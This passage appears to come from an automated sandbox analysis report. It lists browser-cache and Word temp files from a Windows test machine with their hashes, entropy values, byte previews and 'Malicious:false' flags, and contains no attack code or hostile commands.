                                                                                                                                                                                                              SHA-256:3FCD581519B018D93D9DAE37D5970AC475B48502107BCB00EB59856563BF9FF0
                                                                                                                                                                                                              SHA-512:C45A79E2454755E565DF8A55433FFB9A5807A88C1CDE4ED24D03D60CA4182340DBF876A2E79A64C7C2165D75BA9DEF610B5A54E96048969C5AC296E0045A0E98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSStyles/style.csx?k=cb462728-939d-977c-84a3-09e18f84e77a
                                                                                                                                                                                                              Preview: body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid .row h1,.grid .row h2,.grid .row h3,.header-small label{font-family:wf_segoe-ui_light,wf_segoe-ui_normal,Tahoma,Verdana,Arial,sans-serif}.grid{max-width:1600px !important}.c-uhfh-actions,.c-uhfh-gcontainer-st .all-ms-nav,.glyph-global-nav-button{display:none !important}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twitter[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):532
                                                                                                                                                                                                              Entropy (8bit):7.480175935964278
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/79GsdpT04EoI/TGxLd1sjDBdqktOeUoOzQag23jEAgc:SdpfdUyxpgMb1zpg2Tpp
                                                                                                                                                                                                              MD5:B30436EB503A7EA8E77925F435DF4671
                                                                                                                                                                                                              SHA1:3313C5FDE8EC85B94547168B867EFEC0188F5987
                                                                                                                                                                                                              SHA-256:0AC4630B76827B89EBEA070A1BEB6E5175D280EADC76B67FA886CF6068368CA3
                                                                                                                                                                                                              SHA-512:CE6B7F9D8860E146CD41802FBD30AE99F205D145CCA4BBECBAB446851165BEE8316FEAABD83826FB31CA97652E911BE4815ED542F33B5BFEAABDCF71BCEFCDC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/93690392/coreui.statics/images/social/twitter.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V=O.P......u`.A.q...eU......YW..q.UYHD.M.A.]:Xc4..X<.1....&..Ci.;..s.T./?bQF".q....@..G.O..r^....q.j...4F.C.....ik........".....r>.V..^}.H.u....g2...\t7....p.5.C...?..8.......IW...j.x._Ay-S)....bi...B..c.Yk@.........$.......$.@.F....X...B#...*9U.y.to%.m.u.2....Kp.;....b....N..@y..MkL.Fg.-%.~.....Cq.#W4J0.xP..R.+1..kdPm.kw...n.+B..d..J!.p....5..T..84..$..3..O5...m.SHmz..\.ULX._.q....r...f.....h8..g.4...0..|.o$..&....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\webfont[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):747
                                                                                                                                                                                                              Entropy (8bit):4.6828656668633535
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:s+8VRFDRACf6XNC/QC+8VBFDRACf+GC/oC+8hTFDRACfqIGC/QC+8yFDRACfRmG5:sVVzUXNCVVDtCVhpk3CVWDP
                                                                                                                                                                                                              MD5:874482B0D065A500911A1FC0F9D5701C
                                                                                                                                                                                                              SHA1:C1F592725988275403870D9D56933F345EF4F444
                                                                                                                                                                                                              SHA-256:A7A445DB9FD999CE5382A67797E4E9B2C8C513F6F879E6EDC1325DFF7218A9A8
                                                                                                                                                                                                              SHA-512:575601794D022EEE8BC0704F0D9E0FC83D2B48BD3A480E88D669DD3366FBE3244DDAF304C4B128EF949632E7C1A7545D07BDB8EA4B05F63379C71318D95722F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocContent/webfont.css
                                                                                                                                                                                                              Preview: @font-face{font-family:'wf_segoe-ui_normal';..src:url('https://i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff') format('woff');.font-weight:normal;.font-style:normal}.@font-face{font-family:'wf_segoe-ui_normal';.src:url('https://i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff') format('woff');.font-weight:300;.font-style:normal}.@font-face{font-family:'wf_segoe-ui_semibold';.src:url('https://i.s-microsoft.com/fonts/segoe-ui/west-european/semibold/latest.woff') format('woff');.font-weight:normal;.font-style:normal}.@font-face{font-family:'wf_segoe-ui_semilight';.src:url('https://i.s-microsoft.com/fonts/segoe-ui/west-european/semilight/latest.woff') format('woff');.font-weight:normal;.font-style:normal}.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\windows[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):162564
                                                                                                                                                                                                              Entropy (8bit):5.381643869951567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xFvtDo/aKbCHJEb28w9ghcypvaj/d+K7eSWk+pRSoXvQb4BL6Uw5:xF1DiaKbCHJEb28w9ghcypQs5k
                                                                                                                                                                                                              MD5:B9DEDF5497A48967403236E05E9D5C9B
                                                                                                                                                                                                              SHA1:FB240B3C25DB4D1C37CAEDF6099788F67A30EE8A
                                                                                                                                                                                                              SHA-256:88888F40B6B13AC418D141E3765A662B2D20D9C8C5200D0A1082BD7897D37C62
                                                                                                                                                                                                              SHA-512:48035C81064440FD15AF87AC7E7596FCFECCA4E3FB4D6E23870AB129D8A2D2E015FA6669EFD0CF741B41FFA541F02253477ED0313A53EB4D3842EB4FEF2DF483
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" class="" lang="en-us" dir="ltr" prefix="og:http://ogp.me/ns#" xmlns="http://www.w3.org/1999/xhtml"><head> added meta from page --> [if lt IE 9]>.. <link rel="stylesheet" href="//assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.23.1/css/mwf-west-european-default-ie8.min.css"/>.. <![endif]--><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta name="ms.lang" content="en" /><meta name="ms.loc" content="us" /><meta property="og:locale" content="en-us" /><meta name="twitter:creator" content="@microsoft" /><meta name="twitter:site" content="@Windows" /><meta property="fb:app_id" content="30968512668" /><meta name="twitter:card" content="summary_large_image" /><meta property="og:type" content="website" /><meta property="og:sit
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xboxsplash2016[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):42361
                                                                                                                                                                                                              Entropy (8bit):5.140750715278206
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:W/tBhb2wB1l7Hts7ktm1wTMimaAqZIV8pqUG9:wBhbLj+7ktm1wTMimaAqZIVYqP9
                                                                                                                                                                                                              MD5:71121DE26E1091C8A45B7C5E73100434
                                                                                                                                                                                                              SHA1:3F72584D56E523532CE108EDDCE844DC867B0194
                                                                                                                                                                                                              SHA-256:250D843E2B81A27627F59346968290539C28A9994429817BB3D0AFD8CD57A0B1
                                                                                                                                                                                                              SHA-512:D79F1A6D6A9D6985E7AA0CF2554E3F6C637ADB70B64B99DDB2F9B52FF9F5F76BB1F71114961FEBC901C46047FA0074FE779A6C2F4F195CE472C17901E65E0FEF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/bundles/xboxsplash2016?v=H0fjo_2Sbsy01xVZffoltnApkeNKL-uhW0OTlvyP4t41
                                                                                                                                                                                                              Preview: .ui-helper-hidden{display:none}.ui-helper-hidden-accessible{position:absolute;left:-99999999px}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after{content:".";display:block;height:0;clear:both;visibility:hidden}.ui-helper-clearfix{display:inline-block}* html .ui-helper-clearfix{height:1%}.ui-helper-clearfix{display:block}.ui-helper-zfix{width:100%;height:100%;top:0;left:0;position:absolute;opacity:0;filter:Alpha(Opacity=0)}.ui-state-disabled{cursor:default!important}.ui-icon{display:block;text-indent:-99999px;overflow:hidden;background-repeat:no-repeat}.ui-widget-overlay{position:fixed;top:0;left:0;width:100%;height:100%}.ui-widget{font-family:Verdana,Arial,sans-serif;font-size:.9em}.ui-widget .ui-widget{font-size:1em}.ui-widget input,.ui-widget select,.ui-widget textarea,.ui-widget button{font-family:Verdana,Arial,sans-serif;font-size:1em}.ui-widget-content{background-color:#fff;color:#312
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78454E9B-DE8E-4300-98F0-AE5841A8170E}.tmp
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1024
                                                                                                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1024
                                                                                                                                                                                                              Entropy (8bit):1.8010673682681937
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Vy2rcb1aJwcV6k+fSEUuCmwL5H5xwNgREqAWlgFJVql/jlll8vlw2FrA:nGSQ5f+uyZik5uFJVql/buvq2ZA
                                                                                                                                                                                                              MD5:C30C96064206E02976B264BA39C68F76
                                                                                                                                                                                                              SHA1:A5C981C85559BCF8BE4B84204178AC2A29F189E1
                                                                                                                                                                                                              SHA-256:D15618A7AB04A703EE3F686439EE6696769D0777CADAA11FD69AF5B5ED091ABD
                                                                                                                                                                                                              SHA-512:4CFE63E6E1929468B79F9157904ECAEE6F0ED9ADA74868D718223B678B520A8DF36CE62604385EBA7DC31FFA43F1B93BF6FD235ECE5C3819E37C47D591AF9388
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .s.v.H.8.S.l.G.s.N.k.H.F.G.M.q.U.w.P.h.G.x.Z.m.S.F.M.h.9.7.C.B.v.N.s.y.L.v.7.v.k.I.Y._.3.q.i.V.I.8.y.c.Y.r.Y.u.v.H.y.q.q.d.p.g.L.M.C.H.d. . . . . . . . . . . . . . . . . . .5.3.4.5.8.1.9.5.4.5.3.4.5.8.1.9.5.4.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...............................................................................................................................`...f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Cab6547.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59863
                                                                                                                                                                                                              Entropy (8bit):7.99556910241083
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                                                                                                                                                              MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                                                                                                                                                              SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                                                                                                                                                              SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                                                                                                                                                              SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Cab6578.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59863
                                                                                                                                                                                                              Entropy (8bit):7.99556910241083
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                                                                                                                                                              MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                                                                                                                                                              SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                                                                                                                                                              SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                                                                                                                                                              SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Tar6548.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):156386
                                                                                                                                                                                                              Entropy (8bit):6.3086528024913715
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                                                                                                                                                                                              MD5:78CABD9F1AFFF17BB91A105CF4702188
                                                                                                                                                                                                              SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                                                                                                                                                                                              SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                                                                                                                                                                                              SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Tar6579.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):156386
                                                                                                                                                                                                              Entropy (8bit):6.3086528024913715
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                                                                                                                                                                                              MD5:78CABD9F1AFFF17BB91A105CF4702188
                                                                                                                                                                                                              SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                                                                                                                                                                                              SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                                                                                                                                                                                              SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\dat23BA.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 53536, version 0.0
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53536
                                                                                                                                                                                                              Entropy (8bit):7.990885065205809
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:768:EnDF237E5w7Lt5E+nhr770rKeHpu5Jf98WM0U1pCYzaLH6huggyfXdqU7K:EnDF237EKVhhgMfcRzaLahtFPD7K
                                                                                                                                                                                                              MD5:0A619F3BE08403DD84E307AE13A18A38
                                                                                                                                                                                                              SHA1:919BA0304A61B76521807C274385435A903E484B
                                                                                                                                                                                                              SHA-256:23F8E83B9A6FE01CEB2B6299E803767F22924E9CD0B7F62CB1FE6F0A01E694EA
                                                                                                                                                                                                              SHA-512:D369352F4463D69753D8F8882F5924C34AF80717A78ABB2302736189DFD84AB73298881BCE6A847CC89DCA3B69EFE09C41CE69A57AEC231144C89119033B0040
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: wOFF....... ......x.........................FFTM............mr.GDEF...p.........&..GPOS...\......Mr...GSUB...........07.14OS/2.......[...`mHy.cmap.......F....EC.,cvt ............%M*_fpgm...H........=..sgasp...`...........#glyf.............3.head.......6...6..).hhea.......!...$.-.(hmtx...l.........&..loca...x...,...B7*..maxp....... ... .D.nname...X........Z5.post.......a....9..2prep...........2..$_......33.<Z._.<...........0.....-.H.......z............x.c`d`.h......._....b.@.d.......m..........N...Y......./.\...(......x.c`fy......:....a..f.fHcJ.`b..bbaeabb^....A!...|......x.3....gX......0.$..4.H)00..m....x.V.d.W.~......R...WUDUDuW]!........].U..**........EG......R.uuu.m..%.U...H......]k.<.{.y.s...X.,._........2..`/J.2r..\7..A$..r.-.z..j:q..o*...;.8D.'..S.!.%...".A.E^..=b.A4.S.r@.?.I..9.I;L.q<..1Lze.w.......1...i.#.\.....i..c.4...".o'...........L...C....?...@.....5#.G.......g.m._...>...%.3c....1E4q........Y....Wl.v..Q....!...k.l_..q. En.....-.w....~..j
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\dat23E9.tmp
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 43752, version 0.0
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43752
                                                                                                                                                                                                              Entropy (8bit):7.989948825102553
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:4ou5SpJReGArI5KcJuekCej5BA7yCiEOyFAMXUU9EHCWxk0RR3RfryUmDLWaccKR:4TyReDKJuTCwBA7QEOyFAMXsNLRR3RTP
                                                                                                                                                                                                              MD5:BB71FC0E49241107CE16857E160B9576
                                                                                                                                                                                                              SHA1:21B8300FD5F25801AC312123879ED61CC5028CE9
                                                                                                                                                                                                              SHA-256:1A14BB30C0C42FA6C944720D7D2CBC0DDEFF6094D14DC60D9B4CC285DFAAC7B8
                                                                                                                                                                                                              SHA-512:1C75CC29FED7EC7C29D3F84F6F6912E378A02AAE49F3F13FD348BF2BAB7190AB295C54E6553D1475AECE325F48F6BD529A397B20638DFA329D5F7C5EFAADFC0B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: wOFF..............V.........................FFTM............pr.LGDEF.............'..OS/2.......B...`EGuBcmap... ..........=\cvt .......3...V...tfpgm.......b...?.;T.gasp................glyf...........@..C.head...l...3...6.."hhea...........$$...hmtx... ........yc.loca..............~.maxp....... ... .8.#name...........,.+(*post.............m.oprep...|...)...5..N[x.c`d```.z...*...+.<.....{..D..q.D......``...kJ.O.x.c`d`.`.........IF.T...R..............T...............K....x.c`.Pc......:....Q.B3_dHc.b@..Hl.`......./9.|..&..."X..b.......>..x.S;..0...R:.TB..lHl..021...xe..p..J...B..\.'M...........t....O..r0.,;..i.X5..q..6.1.....C.....i.|}.H...:.7...}..L..k[..)-....}.....n..M>..l.RyV..P.......;....9...Z.. t.......1n.w.1..<..I.~.B5.'..O..=.w..}a.N^0.7;..E~.X7.......d.....7......-l..x...[HTQ...=:.6.'.\.>05c.JBeDJi.Ae.5.H"H.,......L....RB...X...iW*.z........e.x)(.N.I.F...k...?X.!....,.F...Y..jmA..e..(.|.#woco........3...N...`9......l.4.<(.B(..p.J.....B=4@..v...a.>P..4..q.C.h
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF3ABED1C33024D82B.TMP
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):29745
                                                                                                                                                                                                              Entropy (8bit):2.02565407244519
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Lypvx4Pwok7+zJ0oSD8PA5v5/G8PANlY/G8PANq9:JkS+oSDL/GLyGLw
                                                                                                                                                                                                              MD5:3D865BAD91FE9B7312BE83718F2AF536
                                                                                                                                                                                                              SHA1:84ECF68724F913C5949BCB1373B57DB4E8663636
                                                                                                                                                                                                              SHA-256:8F13574C4402C8541A7ECF05091FAA1B3F6B182E6178575784BAA6944F64B229
                                                                                                                                                                                                              SHA-512:41532ECA9006DE81E726E31FBD7FD5F76EA41DB18C5B502CE635A418FCE0DDA1A0291FDDCDB9B890E7F1501BF0B1C0606318DAFE7385003D5FD36D37531133A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF711817025C79F793.TMP
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):246352
                                                                                                                                                                                                              Entropy (8bit):2.4028988175215695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Iqapfrf1fkrfDLtfifcDBRXkNw/flmfPBRXkww/flmf7BRXkww/flmfXisbOgqJF:I9zt8DLVqyEwEsEDbOD
                                                                                                                                                                                                              MD5:E49E8AD05C42EA9C9B9E9E86CD0A29F5
